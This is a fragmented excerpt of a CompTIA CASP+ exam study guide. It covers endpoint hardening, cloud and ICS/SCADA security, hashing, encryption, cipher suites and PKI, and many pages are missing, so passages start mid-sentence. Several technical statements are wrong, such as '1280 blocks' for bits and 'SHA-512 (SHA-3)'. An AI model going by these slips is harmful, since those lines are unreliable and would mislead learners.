Address Space Layout Incorporated by all current versions of major
Randomization (ASLR) operating systems, ASLR is a buffer overflow
prevention control that makes it difficult to
guess the memory location of executables
stored in memory.
SELinux
Execution control is the process of determining what additional software or scripts
may be installed or run on a host beyond its baseline. In Linux, execution control
is normally enforced by using a mandatory access control (MAC) kernel module or
Linux Security Module (LSM). Some example LSMs are SELinux (https://github.com/
SELinuxProject) and AppArmor, which is used by Ubuntu, SUSE Linux, and others
(wiki.ubuntu.com/AppArmor).
SEAndroid
Since version 4.3, Android has been based on Security-Enhanced Linux. SEAndroid
(source.android.com/security/selinux) uses mandatory access control (MAC)
policies to run apps in sandboxes. When the app is installed, access is granted (or
not) to specific shared features, such as contact details, SMS texting, and email.
Android is susceptible to attacks that are not visible to the kernel, such as inter-app
communication attacks, and as such SEAndroid cannot address them. To combat
this, MAC controls that operate in middleware, or in between the kernel and
applications, are often effective and referred to as middleware MAC (MMAC.)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
184 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Secure Boot
Secure boot is designed to prevent a computer from being hijacked by a malicious
OS. UEFI is configured with digital certificates from valid OS vendors. The system
firmware checks the operating system boot loader and kernel using the stored
certificate to ensure that it has been digitally signed by the OS vendor. This prevents
a boot loader or kernel that has been changed by malware (or an OS installed
without authorization) from being used. Secure boot is supported on Windows
(docs.microsoft.com/en-us/windows/security/information-protection/secure-the-
windows-10-boot-process) and many Linux platforms (wiki.ubuntu.com/UEFI/
SecureBoot). Secure boot requires UEFI, but does not require a TPM.
Measured Boot
A trusted or measured boot process uses platform configuration registers (PCRs)
in the TPM at each stage in the boot process to check whether hashes of key
system state data (boot firmware, boot loader, OS kernel, and critical drivers) have
changed. This does not usually prevent boot, but it will record the presence of
unsigned kernel-level code.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 185
Device OEMs store secure boot information in the firmware nonvolatile RAM (NV-
RAM) during manufacture. Secure boot information includes a signature database
(db), revoked signature database (dbx) and Key Enrollment Key (KEK) database.
The db and dbx contain signature and/or hash information for UEFI applications,
operating system loaders (boot manager), and UEFI drivers. The KEK contains the
signing keys used to update the db and dbx databases. During device manufacture,
the OEM locks the firmware to prevent changes from being made by anything other
than updates signed with the associated KEK.
Smart card, smart card reader, and hardware security module. (Images © 123RF.com.)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
186 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Application Controls
Above and beyond setting access permissions and group memberships to limit a
userʼs ability to install software or reconfigure a device, more granular application
controls should also be implemented. Application controls more specifically identify
the types of software that can be run and/or the users that can run them. For
example, limiting software to only run from specific directories or only allowing
members of a specific group to run different types of software. Application controls
can also check for the existence of specific digital signatures or application versions
on executables and scripts. Application controls can also be configured to block
specific applications. These configuration options are generally referred to as
allow-lists and block-lists, but the configuration options allow for a wide variety of
restriction capabilities. A useful and effective way to configure application controls
is via the Windows AppLocker tool, which can be configured via group or local
policies.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 187
Host-Based Firewall
Host-based firewall—implemented as software running on a single host designed
to protect that host only. As well as enforcing packet filtering ACLs, a host-based
firewall can be used to allow or deny software processes from accessing the
network.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
188 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 189
Review Activity:
7 Endpoint Protection
Answer the following questions:
1. Identify some reasons why EOL software and hardware are concerning.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
190 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Lesson 7
Summary
6
This lesson explored many mobile and traditional endpoint protection technologies.
The power and functionality of mobile devices, as well as the sophistication of
adversaries, makes the protection of endpoints as difficult as ever. While software
and hardware tools designed to provide centralized configuration and management
of endpoints have evolved rapidly, so too have the mix of technologies used in the
enterprise and the mechanisms by which they can be exploited.
Protecting endpoints requires a thoughtful and well-designed strategy that
prioritizes centralized management, current hardware platforms, monitoring
and assessment, best practice hardening configurations, patching, and advanced
endpoint protection tools.
Key Takeaways
• The separation in features between desktop and mobile is blurred.
• Many organizations allow staff and employees to use their own equipment
which necessitates careful deployment and management control.
• Privacy protections for mobile platforms include geolocation and biometric data.
• Mobile devices can be an indirect source of sensitive data breach, such as has
been seen with socially connected wearable devices.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Lesson 8
Understanding Security Considerations
of Cloud and Specialized Platforms
1
LESSON INTRODUCTION
This lesson explores some of the unique considerations inherent to securing
specialized platforms. The two specialized platforms covered in this lesson include
cloud and industrial computers. Cloud platforms and industrial computers each
have configuration and management risks that set them apart from traditional
computing. Sometimes cloud platforms are integrated with industrial computers,
increasing complexity and cybersecurity risk if important configuration and
management tactics for both of these platforms is not fully understood.
Lesson Objectives
In this lesson, you will:
• Explore BCDR considerations for the cloud.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
192 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Topic 8A
Understand Impacts of Cloud
Technology Adoption
2
The adoption of cloud platforms has brought many benefits and capabilities. Many
traditional techniques and tools used for securing on-premise infrastructure apply
to cloud settings at a conceptual level but must be adapted to use the tools and
technologies available there. With this in mind, this topic explores some of the
options, tools, and considerations that are an important part to adapting operations
into a cloud setting.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 193
occasions in recent years, such as ISP outages and massive-scale DDoS attacks, but
others are less common and potentially catastrophic. One example occurred in
March 2021 at the French cloud provider OVHCloud when one of their data centers
caught fire and was completely destroyed. Many public and private businesses
were impacted by the outage as their services were configured to run out of the
impacted data center.
• Keys should not be stored in the cloud with the services they are used to protect.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
194 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Additional Resources
NISTIR 7956 Cryptographic Key Management Issues & Challenges in Cloud
Services - https://csrc.nist.gov/publications/detail/nistir/7956/final
Key Management in Cloud Services - https://cloudsecurityalliance.org/artifacts/
key-management-when-using-cloud-services/
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 195
of service provision is also called function as a service (FaaS). FaaS products include
AWS Lambda (aws.amazon.com/lambda), Google Cloud Functions (cloud.google.
com/functions), and Microsoft Azure Functions (azure.microsoft.com/services/
functions).
The serverless paradigm eliminates the need to manage physical or virtual
server instances, so there is no management effort for software and patches,
administration privileges, or file system security monitoring. There is no
requirement to provision multiple servers for redundancy or load balancing. As all
of the processing is taking place within the cloud, there is little emphasis on the
provision of a corporate network. This underlying architecture is managed by the
service provider. The principal network security job is to ensure that the clients
accessing the services have not been compromised in a way that allows a malicious
actor to impersonate a legitimate user. This is a particularly important consideration
for the developer accounts and devices used to update the application code
underpinning the services. These workstations must be fully locked down, running
no other applications or web code than those necessary for development.
Serverless does have considerable risks. As a new paradigm, use cases and best
practices are not mature, especially in regards to security. There is also a critical and
unavoidable dependency on the service provider, with limited options for disaster
recovery should that service provision fail.
Serverless architecture depends heavily on the concept of event-driven
orchestration to facilitate operations. For example, when a client connects to
an application, multiple services will be called to authenticate the user and
device, identify the device location and address properties, create a session, load
authorizations for the action, use application logic to process the action, read or
commit information from a database, and write a log of the transaction. This design
logic is different from applications written to run in a “monolithic” server-based
environment. This means that adapting existing corporate software will require
substantial development effort.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
196 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 197
Microsoft Monitor Logs can collect and organize log and performance data from
Azure services into a single repository that can be analyzed using query tools. Rules
can also be crafted to generate alerts for specific results. Information from Monitor
Logs can be visualized using the dashboard in the Azure Portal.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
198 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
• Reverse proxy—this is positioned at the cloud network edge and directs traffic
to cloud services if the contents of that traffic comply with policy. This does not
require configuration of the usersʼ devices. This approach is only possible if the
cloud application has proxy support.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 199
Review Activity:
Impacts of Cloud Technology Adoption
3
1. True or False. Operating in a public cloud removes the need for BCDR
plans due to the fact that cloud platforms are so reliable.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
200 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Topic 8B
Explain Security Concerns for
Sector-Specific Technologies
6
The scope and use of computers is incredibly broad and no better demonstrated
than in industrial settings. Industrial computers have been in use for decades, many
of the systems put in place decades ago are the same ones in use today. Industrial
computers serve critical roles by monitoring and controlling the elements used in
manufacturing, transportation, energy, healthcare, and other sectors. What appears
mundane on the surface, such as controlling whether a valve opens or closes,
can result in catastrophic failures if not properly operated. Industrial computers
must operate reliably, under extreme conditions, and for extremely long service
durations. The type and nature of data collected and transmitted in these settings
is unique and the technology, tools, and protocols used to act on it are also unique.
Industrial computers developed in parallel to traditional computers over the past
several decades, but now with the emergence of advanced and creative adversaries
these two fields have converged. A massive challenge to protecting industrial
computers is understanding the unique protocols and device types and the creative
measures needed to protect them.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 201
Microcontrollers
A microcontroller is a processing unit that can perform sequential operations from
a dedicated instruction set. The instruction set is determined by the vendor at the
time of manufacture. Software running on the microcontroller has to be converted
to these instructions (assembly language). As many embedded systems perform
relatively simple but repetitive operations, it can be more efficient to design the
hardware controller to perform only the instructions needed. One example of this
is the application-specific integrated circuits (ASICs) used in Ethernet switches.
ASICs are expensive to design, however, and work only for a single application, such
as Ethernet switching.
A field programmable gate array (FPGA) is a type of controller that solves this
problem. The structure of the controller is not fully set at the time of manufacture.
The end customer can configure the programming logic of the device to run a
specific application.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
202 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
An ICS comprises plant devices and equipment with embedded PLCs. The PLCs are
linked either by an OT fieldbus serial network or by industrial Ethernet to actuators
that operate valves, motors, circuit breakers, and other mechanical components,
plus sensors that monitor some local state, such as temperature. Output and
configuration of a PLC is performed by one or more human-machine interfaces
(HMIs). An HMI might be a local control panel or software running on a computing
host. PLCs are connected within a control loop, and the whole process automation
system can be governed by a control server. Another important concept is the data
historian, which is a database of all the information generated by the control loop.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 203
Modbus
The components of an ICS network are often described as an operational
technology (OT) network, in contrast to an IT network, comprised of server and
client computing devices. Communications within an OT network are supported by
a network application protocol such as Modbus. The communication protocol gives
control servers and SCADA hosts the ability to query and change the configuration
of each PLC. Modbus was originally designed as a serial protocol (Modbus RTU)
running over a fieldbus network but has been adapted to use Ethernet and TCP/IP
as well. Other protocols include EtherNet/IP, a variant of the Common Industrial
Protocol (CIP), Distributed Network Protocol (DNP3), and Siemens S7comms.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
204 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Sector Description
Energy Power generation and distribution as well as the Oil and Gas
industry. More widely, public utilities including water/sewage,
gas, and public services such as transportation networks.
Industrial Mining and refining raw materials, including hazardous high
heat and pressure furnaces, presses, centrifuges, and pumps.
Manufacturing The creation of components and assembling them into finished
products. Embedded systems are used to control automated
production systems, such as forges, mills, and assembly lines.
These systems work to an extremely high level of precision.
Logistics The movement of materials and goods. Embedded technology
is used in control of automated transport and lift systems plus
sensors for component tracking.
Facilities Site and building management systems, typically operating
automated heating, ventilation, and air conditioning (HVAC);
lighting; and security systems.
Healthcare Assist hospital administrators, doctors, and nurses to keep track
of patients, medical equipment, and supplies, as well as
environmental controls within healthcare facilities
ICS/SCADA have been in use for many decades and were built with little regard
to modern IT security concerns. Commonly referred to as “defenseless systems,”
ICS/SCADA systems control the safe operation of some incredibly important
infrastructure and damage or attack of these systems can result in very tangible
real world outcomes, especially in the energy and healthcare sector. Awareness of
the high-risk nature of many ICS/SCADA applications has increased the demand
for better security controls and well-trained staff to protect them, but there still
remains a gap between what is available and what is needed. ICS/SCADA systems
should be isolated from any other systems and/or networks through the use of
air-gapping. IDS/IPS and configuration change control mechanisms are essential to
detect unauthorized access or unauthorized change, and in situations where the
ICS/SCADA system must be connected to the network only the absolute minimum
level of required access must be permitted.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 205
Review Activity:
Security Concerns for Sector-Specific
7
Technologies
Answer the following questions:
4. An ________ ________ describes the method by which ICS are isolated from
other networked systems.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
206 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Lesson 8
Summary
6
This lesson explored the many important and unique considerations inherent
to cloud as well as industrial settings. Many traditional approaches to the
management and monitoring of computing infrastructure translate to these
platforms in concept but the means by which they are applied is different.
Many cloud platforms require careful configuration of logging outputs and the
implementation of specialized tools to capture and analyze the data. In addition,
regulatory requirements often dictate the types of capabilities that must be
incorporated into cloud platforms. In a related theme, industrial computers use a
wide array of specialized tools and protocols that must be understood to properly
manage and integrate with traditional and/or cloud infrastructures.
Key Takeaways
• The need for BCDR is equally important in cloud infrastructures.
• Cloud infrastructures can fulfill the role of alternate sites for BCDR.
• Log collection and analysis in the cloud requires careful planning and design.
• Types of computers and protocols used in industrial settings are unique and
different to trinational computing in many important ways.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Lesson 9
Implementing Cryptography
1
LESSON INTRODUCTION
Understanding cryptography is more important than ever as its use expands and
techniques to exploit it evolve. Understanding cryptography from the viewpoint
of the practitioner is as much about knowing what to avoid as it is about how
algorithms operate. This lesson will review some of the essential fundamental
concepts of cryptography while also identifying some practical examples of its use.
Lesson Objectives
In this lesson, you will:
• Review hashing concepts and hashing algorithms.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
208 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Topic 9A
Implementing Hashing and
Symmetric Algorithms
2
This topic will largely review the operation of hashing and symmetric encryption.
It is important to be able to confidently distinguish between the algorithms used
for hashing and symmetric encryption as well as the various modes of operation. It
is essential to be able to distinguish between the various algorithms and knowing
which are well regarded and which are now considered obsolete.
2. The same input to a hashing algorithm will generate the same output every
time it is hashed (with the same hashing algorithm). For example, once the
hash value of a text file is generated then the hash output value will always
be the same so long as the file doesn’t change (and the same hash algorithm
is used).
3. The output of the hashing function cannot be used to recreate the input in any
way, which is referred to as being a one-way function.
These points are significant—outputs are predictable and can be used to identify if
something has changed as well as demonstrate that something is known without
sharing the details, for example a password.
Some hurdles that complicate the use of hashing.
• Being certain that the hash of a file is properly represented. If a file is being
analyzed to determine if it has changed, then there must be certainty regarding
the hash value that accurately represents a file’s proper state.
• Older hash algorithms do not create very long outputs by modern standards and
are therefore susceptible to collisions. A collision occurs when two completely
different inputs generate the same hash value. When hash function outputs are
long then this is significantly less likely to occur.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 209
Hash algorithm output is also referred to as the digest, message digest or, in the
most specific case, the “condensed representation of electronic data.”
The following screenshot displays the output of several common hashing
algorithms for the same text file input. Notice the difference in length of the
outputs for the respective hashing algorithms despite the file being the same for
each iteration. Also, notice that the SHA-512 hashing algorithm is used twice at the
end and that the values are identical because the file has not changed. HEX values
represent 4 bits each. A 32 character hex value represents 32x4 = 128-bits.
Using Windows Terminal to hash a file using the Windows certutil command.
(Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
210 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Additional Reading
NIST Policy on Hash Functions
https://csrc.nist.gov/Projects/Hash-Functions/NIST-Policy-on-Hash-Functions
Poly1305
Poly1305 is a MAC focused on speed and efficiency and operates very well on
devices that do not include AES hardware acceleration, such as older iPhone/iPad
and Android devices. On these devices, when Poly1305 is combined with alternative
encryption algorithms (such as ChaCha20 or Salsa20), it produces must faster
performance than traditional algorithms. Fortunately, newer device chips such as
Snapdragon and Apple Silicon include AES hardware acceleration.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 211
integrity and authentication can be accomplished with hashing, but there are
other methods too. This fact begins to demonstrate one source of great confusion
in cryptography. Different algorithms designed to perform different tasks can be
combined in numerous ways to solve different types of problems. Cipher-suites
describe the set of cryptographic algorithms used to protect data.
Symmetric encryption algorithms are split into two categories: stream cipher and
block cipher (cipher is an alternative term for an algorithm).
Stream Cipher
In a stream cipher, each digit of data in the plaintext (input/message) is encrypted
one at a time using a keystream (a stream of pseudorandom values). Stream
ciphers are well-suited for encrypting communications where the total length of
the message is not known. The keystream is generated through the use of an
initialization vector (IV) that is combined with a static key value to generate
a unique keystream. The IV is a continuously changing value to ensure that the
key produces a unique ciphertext from the same plaintext. The keystream must
be unique, so an IV must not be reused with the same key. The recipient must
be able to generate the same keystream as the sender so the streams must be
synchronized. This is accomplished by exchanging the key during the setup of a
communication session or transmitted separately.
Block Cipher
In a block cipher, the plaintext is divided into equal-size blocks (typically of size
128-bit). If there is not enough data in the plaintext (meaning the data to be
encrypted is smaller than the block size), the data is padded to the correct size
using values defined by the algorithm. For example, a 1200-bit plaintext would be
padded with an extra 80 bits to fit into the smallest possible combination of 128-bit
blocks, which is 10 x 128-bit = 1280 blocks. Each block is then encrypted according
to the mode of operation being used, and covered in the next topic.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
212 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Modes of Operation
Modes of operation are used with symmetric block ciphers to enable them to work
on large sets of data. Modes of operation affect the level of security provided by the
underlying block cipher. Modes of operations can be thought of as “techniques” or
methods by which symmetric encryption can be performed in order to mimic the
operation of a stream cipher, namely to process a series of blocks of data, although
the amount of data is known unlike in streaming operations.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 213
Review Activity:
Hashing and Symmetric Algorithms
3
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
214 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Topic 9B
Implementing Appropriate
Asymmetric Algorithms
and Protocols
6
Just like many areas in computer science and information technology, cryptography
has evolved very rapidly. Encryption was the domain of large governments and
military operations and access to it was closely guarded. In the 1970s, Diffie-
Hellman served as a catalyst to much more widespread use of encryption and
the introduction of public key encryption made the implementation of encryption
for any organization with the need to much more practical. Since this time, the
techniques, algorithms, and protocols have evolved, and some widely implemented
schemes have now been relegated to “no longer secure.” As a practitioner,
understanding the historical context of cryptographic methods can help discern
between the alphabet soup of protocols and algorithms that can be a source of
confusion in an already perplexing subject!
2. Bob publishes the public key. Alice wants to send Bob a confidential message,
so she takes a copy of Bob’s public key.
5. Bob receives the message and is able to decrypt it using his private key.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 215
6. If Mallory has been snooping, she can intercept both the message and the
public key.
7. However, Mallory cannot use the public key to decrypt the message, so the
system remains secure.
Asymmetric encryption can be used to prove identity. The holder of a private key
cannot be impersonated by anyone else. The drawback of asymmetric encryption is
that it involves substantial computing overhead compared to symmetric encryption.
The message cannot be larger than the key size. Where a large amount of data is
being encrypted on disk or transported over a network, asymmetric encryption is
inefficient.
Consequently, asymmetric encryption is mostly used for authentication and non-
repudiation and for key agreement and exchange. Key agreement/exchange refers
to settling on a secret symmetric key to use for bulk encryption without anyone else
discovering it.
Key Exchange
Asymmetric encryption solves several problems (such as proof of origin, integrity,
and confidentiality) and is very useful as a result of this. Despite the fact that
asymmetric encryption can be used to provide confidentiality of data, when
compared to symmetric encryption, it is inefficient and therefore not favored over
symmetric encryption for this purpose. For example, protecting data at the same
level of protection using RSA versus AES requires different key lengths. While a
direct comparison of these algorithms is not precise, in general terms RSA would
require a 2048-bit key while AES would require a 128-bit key to provide the same
level of protection.
So in many practical examples what is seen is that cryptographic methods are
combined to solve specific problems. Asymmetric encryption is used to solve the
key distribution problem inherent with symmetric encryption because ultimately
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
216 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
data protection is best done with symmetric encryption, and the key distribution
problem inherent with symmetric encryption can be solved by using asymmetric
encryption. In the diagram above, the message can be replaced with a symmetric
key which in turn means that the symmetric key can be safely distributed by
leveraging the public/private key feature of asymmetric encryption.
Key Agreement
Key agreement differs from key exchange in that a secret (symmetric) key is not
transmitted between parties, it is derived instead. Both parties use mathematic
approaches to mutually agree upon a secret key.
Signing
Public key cryptography can authenticate a sender, because they control a private
key that encrypts messages in a way that no one else can. Public key cryptography
can only be used with very small messages, however. Hashing proves integrity by
computing a unique checksum from input. These two cryptographic functions can
be combined to authenticate a sender and prove the integrity of a message. This
usage is called a digital signature. The following process is used to create a digital
signature using RSA encryption:
1. The sender (Alice) creates a digest of a message, using a pre-agreed hash
algorithm, such as SHA256, and then encrypts the digest using her private key.
2. Alice attaches the digital signature to the original message and sends both the
signature and the message to Bob.
3. Bob decrypts the signature using Alice’s public key, resulting in the original
hash.
4. Bob then calculates his own checksum for the document (using the same
algorithm as Alice) and compares it with Alice’s hash.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 217
If the two hashes are the same, then the data has not been tampered with during
transmission, and Alice’s identity is guaranteed. If either the data had changed or a
malicious user (Mallory) had intercepted the message and used a different private
key, the digests would not match.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
218 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Cipher Suites
A cipher suite is the algorithm supported by both the client and server to perform
the different encryption and hashing operations required by the protocol. Prior to
TLS 1.3, a cipher suite would be written in the following form:
ECDHE-RSA-AES128-GCM-SHA256
This means that the server can use Elliptic Curve Diffie-Hellman Ephemeral mode
for session key agreement, RSA signatures, 128-bit AES-GCM (Galois Counter Mode)
for symmetric bulk encryption, and 256-bit SHA for HMAC functions. Suites the
server prefers are listed earlier in its supported cipher list.
TLS 1.3 uses simplified and shortened suites. A typical TLS 1.3 cipher suite appears
as follows:
TLS_AES_256_GCM_SHA384
Only ephemeral key agreement is supported in 1.3 and the signature type is
supplied in the certificate, so the cipher suite only lists the bulk encryption key
strength and mode of operation (AES_256_GCM) plus the cryptographic hash
algorithm (SHA384) used within the new hash key derivation function (HKDF). HKDF
is the mechanism by which the shared secret established by D-H key agreement is
used to derive symmetric session keys.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 219
A downgrade attack is where a man-in-the-middle tries to force the use of a weak cipher
suite and SSL/TLS version.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
220 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
2. Bob uses the public key in the certificate to decode her signature and the
signature of the CA (or chain of CAs) validating her digital certificate and digital
ID and decides that he can trust Alice and her email address.
3. He responds with his digital certificate and public key and Alice, following the
same process, decides to trust Bob.
4. Both Alice and Bob now have one another’s certificates in their trusted
certificate stores.
5. When Alice wants to send Bob a confidential message, she makes a hash
of the message and signs the hash using her private key. She then encrypts
the message, hash, and her public key using Bob’s public key and sends a
message to Bob with this data as an S/MIME attachment.
6. Bob receives the message and decrypts the attachment using his private key.
He validates the signature and the integrity of the message by decrypting
it with Alice’s public key and comparing her hash value with one he makes
himself.
• A user key pair is a means for a client to login to an SSH server. The server stores
a copy of the client’s public key. The client uses the linked private key to generate
an authentication request and sends the request (not the private key) to the
server. The server can only validate this request if the correct public key is held
for that client.
SSH keys have often not been managed very well, leading to numerous security
breaches, most infamously the Sony hack (ssh.com/malware). There are vendor
solutions for SSH key management, or you can configure servers and clients to
use public key infrastructure (PKI) and certificate authorities (CAs) to validate
identities.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 221
Security credentials for an account on Amazon Web Services (AWS). The user can authenticate with
a password credential, or use an access key within a script. The access key is stored only on the
user’s client device and cannot be retrieved via the console. It can be disabled or deleted, however.
(Screenshot courtesy of Amazon.com)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
222 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 223
has not been modified. The payload is not encrypted so this protocol does not
provide confidentiality. Also, the inclusion of IP header fields in the ICV means
that the check will fail across NAT gateways, where the IP address is rewritten.
Consequently, AH is not often used.
IPSec datagram using AH—The integrity of the payload and IP header is ensured by the Integrity
Check Value (ICV), but the payload is not encrypted.
IPSec datagram using ESP—The TCP header and payload from the original packet are
encapsulated within ESP and encrypted to provide confidentiality.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
224 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
In 2015, and in response to the emerging threat that quantum computing power poses
to cryptography, the NSA announced that it planned to replace Suite B with a new
standard. Suite B recommendations were phased out in 2016 and replaced with the
Commercial National Security Algorithm Suite (CNSA) which is designed to work as an
intermediary standard until post-quantum cryptographic standards are formulated.
Additional Details
NIST Elliptic Curve Cryptography Project
https://csrc.nist.gov/Projects/Elliptic-Curve-Cryptography
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 225
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
226 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Review Activity:
Appropriate Asymmetric Algorithms
and Protocols
7
2. What is the bulk encryption method used in the following cipher suite?
ECDHE-RSA-AES128-GCM-SHA256
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 227
Lesson 9
Summary
6
Key Takeaways
• The MD5 and SHA-1 hashing algorithms have been deprecated in favor of
SHA-256 and SHA-512 (SHA-3).
• Modes of operation are like “techniques” used to operate block ciphers like
stream ciphers.
• ECB and CBC modes of operation are susceptible to padding-oracle attacks and
should not be used.
• SSL 2.0, SSL 3.0, TLS 1.0, and TLS 1.1 have all been deprecated and should no
longer be used.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Lesson 10
Implementing Public Key
Infrastructure (PKI)
1
LESSON INTRODUCTION
Public Key Infrastructure describes a collection of infrastructure, software, and
services designed to help manage the storage, protection, issuance, and use of
digital certificates. The range of uses and applications is wide and the elements
involved in its configuration and use are quite detailed. This lesson will explore
the role of PKI at a high level initially and then delve into more details regarding
the critical components of the infrastructure and practical applications of digital
certificates. Additionally, the lesson will explore some of the potential problems
associated with PKI and digital certificates.
Lesson Objectives
In this lesson, you will:
• Understand the role of PKI.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
230 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Topic 10A
Analyze Objectives of Cryptography
and Public Key Infrastructure (PKI)
2
Public Key Infrastructure describes the set of infrastructure and software that
makes public key encryption usable. When properly configured, PKI can provide
seamless protection of software users and devices. PKI generates and issues
digital certificates that have a wide range of applications beyond the protection of
websites, for which they are oftentimes associated. This topic will explore some of
the common uses of PKI and digital certificates in order to better understand the
benefits this service can provide.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 231
stored with a trusted third party. Some PKI infrastructures allow private keys to be
regenerated under certain circumstances.
Code Signing
Code, such as applications, drivers, executables, and similar software programs, can
be digitally signed using a code signing certificate provided by a trusted certificate
authority (CA). If the code signing certificate is provided by a mutually trusted CA,
such as a public PKI, the developer can use the associated private key to encrypt
their files and provide proof of origin to clients wishing to use their software. The
